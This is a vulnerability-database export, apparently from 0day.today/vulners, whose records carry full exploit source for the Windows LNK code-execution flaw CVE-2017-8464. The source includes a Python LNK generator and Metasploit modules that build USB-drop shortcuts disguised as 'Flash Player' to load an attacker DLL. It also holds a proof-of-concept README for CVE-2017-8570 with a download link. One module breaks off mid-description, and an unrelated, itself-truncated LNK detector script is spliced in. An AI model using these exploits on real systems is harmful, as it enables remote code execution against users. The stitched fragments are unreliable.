"THREATPOST:C0A58646680EABD23F9ABE6CC20F9F2E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:69233FAF477D3FFBB70EAF6FDC954DB3", "TRENDMICROBLOG:6AD718FC3C384CF6470A9D6815A565D3", "TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090", "TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D"]}, {"type": "zdt", "idList": ["1337DAY-ID-28197", "1337DAY-ID-28245", "1337DAY-ID-28973", "1337DAY-ID-29976"]}]}, "score": {"value": 1.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:CC1AB90B-52E1-444F-A6F4-1F3F95B15460"]}, {"type": "canvas", "idList": ["SPECIAL_LNK"]}, {"type": "cert", "idList": ["VU:824672"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0477", "CPAI-2017-0725"]}, {"type": "cisa", "idList": ["CISA:D70586B2C2D5D982D54DA686CCF0F4D1"]}, {"type": "cve", "idList": ["CVE-2017-8464", "CVE-2017-8570"]}, {"type": "exploitdb", "idList": ["EDB-ID:44263"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170616-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11039", "KLA11046", "KLA11069"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:CVE-2017-8464", "MS:CVE-2017-8570"]}, {"type": "mskb", "idList": ["KB3213624"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201787021"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_JUN_WINDOWS8.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810903", "OPENVAS:1361412562310811154", "OPENVAS:1361412562310811159", "OPENVAS:1361412562310811164", "OPENVAS:1361412562310811165", "OPENVAS:1361412562310811167", "OPENVAS:1361412562310811168", "OPENVAS:1361412562310811171", "OPENVAS:1361412562310811173", "OPENVAS:1361412562310811178", "OPENVAS:1361412562310811196", 
"OPENVAS:1361412562310811208"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:143623"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E752DE2F12FECA2E217194D510424325"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:5EEA40487C97CFD1AC5560D7EB4368F6"]}, {"type": "securelist", "idList": ["SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:73735B62C781261398E44FFF82262BCD"]}, {"type": "symantec", "idList": ["SMNTC-99445"]}, {"type": "talosblog", "idList": ["TALOSBLOG:212BF0D0902B16A1E3C6ABB19FCEB336", "TALOSBLOG:7FDC117533451294884ABE03F31ED36B"]}, {"type": "thn", "idList": ["THN:4220A2AF1052C7831C6C2F36BFA4CD47", "THN:6885760BEEB9A6CBDFB108443DDF540C"]}, {"type": "threatpost", "idList": ["THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6AD718FC3C384CF6470A9D6815A565D3", "TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090", "TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D"]}, {"type": "zdt", "idList": ["1337DAY-ID-29976"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-8464", "epss": "0.974840000", "percentile": "0.999390000", "modified": "2023-03-17"}, {"cve": "CVE-2017-8570", "epss": "0.974710000", "percentile": "0.999270000", "modified": "2023-03-17"}], "vulnersScore": 1.2}, "_state": {"dependencies": 1660004461, "score": 1659994274, "epss": 1679098904}, "_internal": {"score_hash": "554c0bb32945ea275f31e3bbde830c83"}}
{"zdt": [{"lastseen": "2018-02-06T01:16:08", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-08-06T00:00:00", "type": "zdt", "title": "Microsoft Windows - LNK Shortcut File Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-08-06T00:00:00", "id": "1337DAY-ID-28245", "href": "https://0day.today/exploit/description/28245", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n \r\n# Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability\r\n# CVE : 2017-8464\r\n# Authors : [ykoster, nixawk]\r\n# Notice : Only for educational purposes.\r\n# Support : python2\r\n \r\nimport struct\r\n \r\n \r\ndef generate_SHELL_LINK_HEADER():\r\n # _________________________________________________________________\r\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\r\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\r\n # -----------------------------------------------------------------\r\n # | HeaderSize |\r\n # -----------------------------------------------------------------\r\n # | LinkCLSID (16 bytes) |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | LinkFlags |\r\n # -----------------------------------------------------------------\r\n # | FileAttributes |\r\n # -----------------------------------------------------------------\r\n # | CreationTime |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | AccessTime |\r\n # -----------------------------------------------------------------\r\n # | ... 
|\r\n # -----------------------------------------------------------------\r\n # | WriteTime |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | FileSize |\r\n # -----------------------------------------------------------------\r\n # | IconIndex |\r\n # -----------------------------------------------------------------\r\n # | ShowCommand |\r\n # -----------------------------------------------------------------\r\n # | HotKey | Reserved1 |\r\n # -----------------------------------------------------------------\r\n # | Reserved2 |\r\n # -----------------------------------------------------------------\r\n # | Reserved3 |\r\n # -----------------------------------------------------------------\r\n \r\n shell_link_header = [\r\n b'\\x4c\\x00\\x00\\x00', # \"HeaderSize\" : (4 bytes)\r\n b'\\x01\\x14\\x02\\x00\\x00\\x00\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x46', # \"LinkCLSID\" : (16 bytes) HKEY_CLASSES_ROOT\\CLSID\\{00021401-0000-0000-C000-000000000046}\r\n b'\\x81\\x00\\x00\\x00', # \"LinkFlags\" : (4 bytes) 0x81 = 0b10000001 = HasLinkTargetIDList + IsUnicode\r\n b'\\x00\\x00\\x00\\x00', # \"FileAttributes\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"CreationTime\" : (8 bytes)\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"AccessTime\" : (8 bytes)\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"WriteTime\" : (8 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"FileSize\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"IconIndex\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"ShowCommand\" : (4 bytes)\r\n b'\\x00\\x00', # \"HotKey\" : (2 bytes)\r\n b'\\x00\\x00', # \"Reserved1\" : (2 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"Reserved2\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"Reserved3\" : (4 bytes)\r\n ]\r\n \r\n return b\"\".join(shell_link_header)\r\n \r\n \r\ndef generate_LINKTARGET_IDLIST(path, name):\r\n # 
_________________________________________________________________\r\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\r\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\r\n # -----------------------------------------------------------------\r\n # | IDListSize | IDList(variable) |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n \r\n # IDList = ItemID + ItemID + ... + TerminalID\r\n # ItemID = ItemIDSize + Data\r\n \r\n def generate_ItemID(Data):\r\n itemid = [\r\n struct.pack('H', len(Data) + 2), # ItemIDSize + len(Data)\r\n Data\r\n ]\r\n # ItemIDSize = struct.pack('H', len(Data) + 2) # ItemIDSize + len(Data)\r\n \r\n # return ItemIDSize + Data\r\n \r\n return b\"\".join(itemid)\r\n \r\n def generate_cpl_applet(path, name=name):\r\n name += b'\\x00'\r\n path += b'\\x00'\r\n \r\n bindata = [\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x6a\\x00\\x00\\x00\\x00\\x00\\x00',\r\n struct.pack('H', len(path)),\r\n struct.pack('H', len(name)),\r\n path.encode('utf-16')[2:],\r\n name.encode('utf-16')[2:],\r\n b\"\\x00\\x00\" # comment\r\n ]\r\n \r\n return b\"\".join(bindata)\r\n \r\n idlist = [\r\n # ItemIDList\r\n \r\n generate_ItemID(b'\\x1f\\x50\\xe0\\x4f\\xd0\\x20\\xea\\x3a\\x69\\x10\\xa2\\xd8\\x08\\x00\\x2b\\x30\\x30\\x9d'),\r\n generate_ItemID(b'\\x2e\\x80\\x20\\x20\\xec\\x21\\xea\\x3a\\x69\\x10\\xa2\\xdd\\x08\\x00\\x2b\\x30\\x30\\x9d'),\r\n generate_ItemID(generate_cpl_applet(path)),\r\n \r\n b'\\x00\\x00', # TerminalID\r\n ]\r\n \r\n idlist = b\"\".join(idlist)\r\n idlistsize = struct.pack('H', len(idlist))\r\n \r\n linktarget_idlist = [\r\n idlistsize,\r\n idlist,\r\n ]\r\n \r\n return b\"\".join(linktarget_idlist)\r\n \r\n \r\ndef generate_EXTRA_DATA():\r\n # ExtraData refers to a set of structures that convey additional information about a link target. 
These\r\n # optional structures can be present in an extra data section that is appended to the basic Shell Link\r\n # Binary File Format.\r\n \r\n # EXTRA_DATA = *EXTRA_DATA_BLOCK TERMINAL_BLOCK\r\n \r\n # EXTRA_DATA_BLOCK = CONSOLE_PROPS / CONSOLE_FE_PROPS / DARWIN_PROPS /\r\n # ENVIRONMENT_PROPS / ICON_ENVIRONMENT_PROPS /\r\n # KNOWN_FOLDER_PROPS / PROPERTY_STORE_PROPS /\r\n # SHIM_PROPS / SPECIAL_FOLDER_PROPS /\r\n # TRACKER_PROPS / VISTA_AND_ABOVE_IDLIST_PROPS\r\n \r\n # SpecialFolderDataBlock\r\n \r\n # _________________________________________________________________\r\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\r\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\r\n # -----------------------------------------------------------------\r\n # | BlockSize |\r\n # -----------------------------------------------------------------\r\n # | BlockSignatire |\r\n # -----------------------------------------------------------------\r\n # | SpecialFolderID |\r\n # -----------------------------------------------------------------\r\n # | Offset |\r\n # -----------------------------------------------------------------\r\n \r\n extra_data = [\r\n b'\\x10\\x00\\x00\\x00',\r\n b'\\x05\\x00\\x00\\xA0',\r\n b'\\x03\\x00\\x00\\x00',\r\n b'\\x28\\x00\\x00\\x00',\r\n b'\\x00\\x00\\x00\\x00' # TERMINAL_BLOCK\r\n ]\r\n \r\n return b\"\".join(extra_data)\r\n \r\n \r\ndef ms_shllink(path, name=b\"Microsoft\"):\r\n '''build Shell Link (.LNK) Binary File Format'''\r\n \r\n lnk_format = [\r\n \r\n # Structures\r\n \r\n # SHELL_LINK = SHELL_LINK_HEADER [LINKTARGET_IDLIST] [LINKINFO]\r\n # [STRING_DATA] *EXTRA_DATA\r\n \r\n \r\n # SHELL_LINK_HEADER:\r\n # A ShelllinkHeader structure which contains identification information, timestamps, and\r\n # flags that specify the presence of optional structures.\r\n \r\n generate_SHELL_LINK_HEADER(),\r\n \r\n # LINKTARGET_IDLIST:\r\n # An optional LinkTargetIDList structure, which specifies the target of 
the link. The\r\n # presence of this structure is specified by the HasLinkTargetIDList bit in the ShellLinkHeader.\r\n #\r\n #\r\n \r\n generate_LINKTARGET_IDLIST(path, name),\r\n \r\n # LINKINFO:\r\n # An optional LinkInfo structure, which specifies information necessary to resolve the link target.\r\n # The presence of this structure is specified by the HasLinkInfo bit in the ShellLinkHeader.\r\n \r\n # STRING_DATA:\r\n # Zero or more optional StringData structures, which are used to convey user interface and path\r\n # identification information. The presence of these structures is specified by bits in the ShellLinkHeader.\r\n \r\n # STRING_DATA = [NAME_STRING] [RELATIVE_PATH] [WORKING_DIR]\r\n # [COMMAND_LINE_ARGUMENTS] [ICON_LOCATION]\r\n \r\n # EXTRA_DATA:\r\n # Zero or more ExtraData structures\r\n \r\n generate_EXTRA_DATA()\r\n ]\r\n \r\n return b\"\".join(lnk_format)\r\n \r\n \r\nif __name__ == '__main__':\r\n import sys\r\n \r\n if len(sys.argv) != 3:\r\n print(\"[*] Name : CVE-2017-8464 | LNK Remote Code Execution Vulnerability\")\r\n print(\"[*] Usage: %s </path/to/test.lnk> </path/to/test.dll>\" % sys.argv[0])\r\n sys.exit(0)\r\n \r\n lnkpath = sys.argv[1]\r\n dllpath = sys.argv[2]\r\n \r\n bindata = ms_shllink(path=dllpath)\r\n \r\n with open(lnkpath, 'wb') as lnkf:\r\n lnkf.write(bindata)\r\n \r\n \r\n## References\r\n \r\n# 1. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464\r\n# 2. https://msdn.microsoft.com/en-us/library/dd871305.aspx\r\n# 3. https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/[MS-SHLLINK]-160714.pdf\r\n# 4. https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf\r\n# 5. https://support.microsoft.com/en-us/help/149648/description-of-control-panel--cpl-files\r\n# 6. https://twitter.com/mkolsek/status/877499744704237568\r\n# 7. 
https://community.saas.hpe.com/t5/Security-Research/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/251257#.WXi4uNPys6g\r\n# 8. https://github.com/rapid7/metasploit-framework/pull/8767\n\n# 0day.today [2018-02-05] #", "sourceHref": "https://0day.today/exploit/28245", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-19T02:08:31", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-07-26T00:00:00", "type": "zdt", "title": "Microsoft Windows - LNK Shortcut File Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-07-26T00:00:00", "id": "1337DAY-ID-28197", "href": "https://0day.today/exploit/description/28197", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::EXE\r\n \r\n attr_accessor :exploit_dll_name\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'LNK Remote Code Execution Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\r\n that contain a dynamic icon, loaded from a malicious DLL.\r\n \r\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\r\n similar except in an additional SpecialFolderDataBlock is included. The folder ID set\r\n in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass\r\n the CPL whitelist. 
This bypass can be used to trick Windows into loading an arbitrary\r\n DLL file.\r\n },\r\n 'Author' =>\r\n [\r\n 'Uncredited', # vulnerability discovery\r\n 'Yorick Koster' # msf module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2017-8464'],\r\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],\r\n ['URL', 'http://paper.seebug.org/357/'], # writeup\r\n ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n },\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Payload' =>\r\n {\r\n 'Space' => 2048,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ],\r\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ]\r\n ],\r\n 'DefaultTarget' => 0, # Default target is 64-bit\r\n 'DisclosureDate' => 'Jun 13 2017'))\r\n \r\n register_advanced_options(\r\n [\r\n OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])\r\n ])\r\n end\r\n \r\n def exploit\r\n dll = generate_payload_dll\r\n dll_name = \"#{rand_text_alpha(16)}.dll\"\r\n dll_path = store_file(dll, dll_name)\r\n print_status(\"#{dll_path} created copy it to the root folder of the target USB drive\")\r\n \r\n # HACK the vulnerability doesn't appear to work with UNC paths\r\n # Create LNK files to different drives instead\r\n 'DEFGHIJKLMNOPQRSTUVWXYZ'.split(\"\").each do |i|\r\n lnk = generate_link(\"#{i}:\\\\#{dll_name}\")\r\n lnk_path = store_file(lnk, \"#{rand_text_alpha(16)}_#{i}.lnk\")\r\n print_status(\"#{lnk_path} create, copy to the USB drive if drive letter is #{i}\")\r\n end\r\n end\r\n \r\n def generate_link(path)\r\n path << \"\\x00\"\r\n display_name = \"Flash Player\\x00\" # LNK Display Name\r\n comment = \"\\x00\"\r\n \r\n # Control Panel Applet ItemID with our DLL\r\n cpl_applet = [\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 
0x00, 0x00, 0x00, 0x00, \r\n 0x00, 0x00\r\n ].pack('C*')\r\n cpl_applet << [path.length].pack('v')\r\n cpl_applet << [display_name.length].pack('v')\r\n cpl_applet << path.unpack('C*').pack('v*')\r\n cpl_applet << display_name.unpack('C*').pack('v*')\r\n cpl_applet << comment.unpack('C*').pack('v*')\r\n \r\n # LinkHeader\r\n ret = [\r\n 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C\r\n 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046\r\n 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)\r\n 0x00, 0x00, 0x00, 0x00, # FileAttributes\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime\r\n 0x00, 0x00, 0x00, 0x00, # FileSize\r\n 0x00, 0x00, 0x00, 0x00, # IconIndex\r\n 0x00, 0x00, 0x00, 0x00, # ShowCommand\r\n 0x00, 0x00, # HotKey\r\n 0x00, 0x00, # Reserved1\r\n 0x00, 0x00, 0x00, 0x00, # Reserved2\r\n 0x00, 0x00, 0x00, 0x00 # Reserved3\r\n ].pack('C*')\r\n \r\n # IDList\r\n idlist_data = ''\r\n idlist_data << [0x12 + 2].pack('v') # ItemIDSize\r\n idlist_data << [\r\n # This PC\r\n 0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,\r\n 0x30, 0x9d\r\n ].pack('C*')\r\n idlist_data << [0x12 + 2].pack('v') # ItemIDSize\r\n idlist_data << [\r\n # All Control Panel Items\r\n 0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\r\n 0x30, 0x9d\r\n ].pack('C*')\r\n idlist_data << [cpl_applet.length + 2].pack('v')\r\n idlist_data << cpl_applet\r\n idlist_data << [0x00].pack('v') # TerminalID\r\n \r\n # LinkTargetIDList\r\n ret << [idlist_data.length].pack('v') # IDListSize\r\n ret << idlist_data\r\n \r\n # ExtraData\r\n # SpecialFolderDataBlock\r\n ret << [\r\n 0x10, 0x00, 0x00, 0x00, # BlockSize\r\n 0x05, 0x00, 0x00, 
0xA0, # BlockSignature 0xA0000005\r\n 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel)\r\n 0x28, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList\r\n ].pack('C*')\r\n # TerminalBlock\r\n ret << [0x00, 0x00, 0x00, 0x00].pack('V')\r\n ret\r\n end\r\n \r\n # Store the file in the MSF local directory (eg, /root/.msf4/local/)\r\n def store_file(data, filename)\r\n ltype = \"exploit.fileformat.#{self.shortname}\"\r\n \r\n if ! ::File.directory?(Msf::Config.local_directory)\r\n FileUtils.mkdir_p(Msf::Config.local_directory)\r\n end\r\n \r\n if filename and not filename.empty?\r\n if filename =~ /(.*)\\.(.*)/\r\n ext = $2\r\n fname = $1\r\n else\r\n fname = filename\r\n end\r\n else\r\n fname = \"local_#{Time.now.utc.to_i}\"\r\n end\r\n \r\n fname = ::File.split(fname).last\r\n \r\n fname.gsub!(/[^a-z0-9\\.\\_\\-]+/i, '')\r\n fname << \".#{ext}\"\r\n \r\n path = File.join(\"#{Msf::Config.local_directory}/\", fname)\r\n full_path = ::File.expand_path(path)\r\n File.open(full_path, \"wb\") { |fd| fd.write(data) }\r\n \r\n full_path.dup\r\n end\r\nend\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/28197", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T16:16:00", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2018-03-09T00:00:00", "type": "zdt", "title": "Microsoft Office - Composite Moniker Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2018-03-09T00:00:00", "id": "1337DAY-ID-29976", "href": "https://0day.today/exploit/description/29976", "sourceData": "## What?\r\n \r\nThis repo contains a Proof of Concept exploit for CVE-2017-8570, a.k.a the \"Composite Moniker\" vulnerability. 
This demonstrates using the Packager.dll trick to drop an sct file into the %TEMP% directory, and then execute it using the primitive that the vulnerability provides.\r\n \r\nDownload: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44263.zip\r\n \r\n## Why?\r\n \r\nA few reasons.\r\n \r\n1. I wanted to see if it was possible to use the [Packager.dll file-dropping trick](https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/) to exploit this vulnerability.\r\n2. As far as I'm aware, all other public exploits for CVE-2017-8570 are actually exploiting the \"Script Moniker\" variant of CVE-2017-0199 and are not actually composite moniker exploits.\r\n3. Raise awareness of exploitation techniques used in the wild, and help defenders to detect exploitation attempts.\r\n \r\n## How to run\r\n \r\nSimply run the script, providing an Sct file to execute, and an output name for your RTF file:\r\n \r\n python packager_composite_moniker.py -s calc.sct -o example.rtf\r\n [+] RTF file written to: example.rtf\r\n \r\n \r\n## Detection\r\n \r\nI have included a Yara rule to detect attempts to exploit this vulnerability via RTF.\r\n \r\n## References\r\n \r\n- https://justhaifei1.blogspot.co.uk/2017/07/bypassing-microsofts-cve-2017-0199-patch.html\r\n- https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/\r\n- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570\n\n# 0day.today [2018-03-13] #", "sourceHref": "https://0day.today/exploit/29976", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-05T21:30:22", "description": "This Metasploit module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 (CVE-2015-0096). 
The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. The PATH option must be an absolute path to a writeable directory which is indexed for searching. If no PATH is specified, the module defaults to %USERPROFILE%.", "cvss3": {}, "published": "2017-11-09T00:00:00", "type": "zdt", "title": "Microsoft Windows LNK File Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2015-0095"], "modified": "2017-11-09T00:00:00", "id": "1337DAY-ID-28973", "href": "https://0day.today/exploit/description/28973", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n\r\n attr_accessor :exploit_dll_name\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'LNK Code Execution Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\r\n that contain a dynamic icon, loaded from a malicious DLL.\r\n\r\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\r\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\r\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\r\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\r\n DLL file.\r\n\r\n The PATH option must be an absolute path to a writeable directory which is indexed for\r\n searching. 
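The three CVE-2017-8464 generators above all emit the same shape of file: a ShellLinkHeader with LinkFlags 0x81, an IDList whose last ItemID is a Control Panel applet entry naming a DLL, and a SpecialFolderDataBlock (signature 0xA0000005) whose SpecialFolderID is CSIDL_CONTROLS (0x03). The following is an added example, not code from this page or from any of the exploit authors: a minimal [MS-SHLLINK] parser that walks the header, IDList, LinkInfo/StringData and ExtraData sections and reports the DLL/CPL path such a shortcut would make the shell load. It assumes the applet ItemID layout those generators use (18-byte prefix, two uint16 character counts, then UTF-16LE path, display name and comment); other Control Panel item encodings are not decoded. `build_lnk` is a constructed sample generator in that same layout, included only so the detector can be exercised offline; the `THIS_PC_ITEM` bytes are copied from the generators.

```python
"""Flag the LNK layout the CVE-2017-8464 / MS15-020 generators emit: an IDList
holding a Control Panel applet ItemID that names a .dll/.cpl, plus a
SpecialFolderDataBlock with SpecialFolderID = CSIDL_CONTROLS ([MS-SHLLINK])."""
import struct
import uuid

LINK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_DATA_FLAGS = (0x04, 0x08, 0x10, 0x20, 0x40)  # Name, RelativePath, WorkingDir, Arguments, IconLocation
SPECIAL_FOLDER_SIG = 0xA0000005                     # SpecialFolderDataBlock signature
CSIDL_CONTROLS = 0x03                               # My Computer\Control Panel
THIS_PC_ITEM = bytes.fromhex("1f50e04fd020ea3a6910a2d808002b30309d")  # copied from the generators

def parse_header(data):
    """Validate the 76-byte ShellLinkHeader and return its LinkFlags."""
    if len(data) < 0x4C:
        raise ValueError("too short for a Shell Link header")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or uuid.UUID(bytes_le=clsid) != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    return flags

def parse_idlist(data, pos):
    """Return ([ItemID Data, ...], offset just past the IDList)."""
    (size,) = struct.unpack_from("<H", data, pos)           # IDListSize
    end, pos, items = pos + 2 + size, pos + 2, []
    while pos + 2 <= end:
        (item_size,) = struct.unpack_from("<H", data, pos)  # ItemIDSize, 0 = TerminalID
        if item_size == 0:
            break
        items.append(data[pos + 2:pos + item_size])
        pos += item_size
    return items, end

def skip_optional_sections(data, pos, flags):
    """Step over LinkInfo and StringData; the detector needs neither."""
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]        # LinkInfoSize
    for bit in STRING_DATA_FLAGS:
        if flags & bit:                                      # CountCharacters + chars
            pos += 2 + struct.unpack_from("<H", data, pos)[0] * (2 if flags & IS_UNICODE else 1)
    return pos

def parse_extra_data(data, pos):
    """Return {BlockSignature: body} for each block before the TerminalBlock."""
    blocks = {}
    while pos + 8 <= len(data):
        block_size, sig = struct.unpack_from("<II", data, pos)
        if block_size < 4:                                   # TerminalBlock
            break
        blocks[sig] = data[pos + 8:pos + block_size]
        pos += block_size
    return blocks

def parse_cpl_applet_item(item):
    """Assumed applet ItemID layout (as the generators build it): 18-byte prefix,
    uint16 path/name char counts, UTF-16LE path, name, comment -> (path, name)."""
    if len(item) < 22:
        return None
    path_chars, name_chars = struct.unpack_from("<HH", item, 18)
    path_end = 22 + 2 * path_chars
    if path_end + 2 * name_chars > len(item):
        return None
    path = item[22:path_end].decode("utf-16-le", "replace").rstrip("\x00")
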